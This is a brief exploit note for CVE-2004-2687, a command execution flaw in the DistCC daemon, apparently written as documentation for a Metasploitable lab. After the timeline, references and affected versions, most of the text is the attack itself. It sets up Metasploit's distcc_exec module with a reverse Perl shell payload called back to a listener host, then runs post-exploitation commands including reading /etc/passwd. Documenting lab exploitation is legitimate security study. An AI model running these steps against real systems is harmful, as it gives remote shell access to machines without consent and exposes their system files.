CVE-2004-2687 : DistCC Daemon Command Execution

Timeline :

Vulnerability discovered by Ray Slakinski & Jason McLeod
Public release of the vulnerability the 2005-03-10
Metasploit PoC provided the 2006-01-20 (not sure)

PoC provided by :

hdm

Reference(s) :

CVE-2004-2687
OSVDB-13378

Affected version(s) :

DistCC 1.x
DistCC below version or equal to 2.18.3

Tested on Metasploitable with :

DistCC 2.18.3-4.1ubuntu1

Description :

This module uses a documented security weakness to execute arbitrary commands on any system running distccd.

Commands :

use exploit/unix/misc/distcc_exec
set RHOST 192.168.178.45
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit

id
uname -a
cat /etc/passwd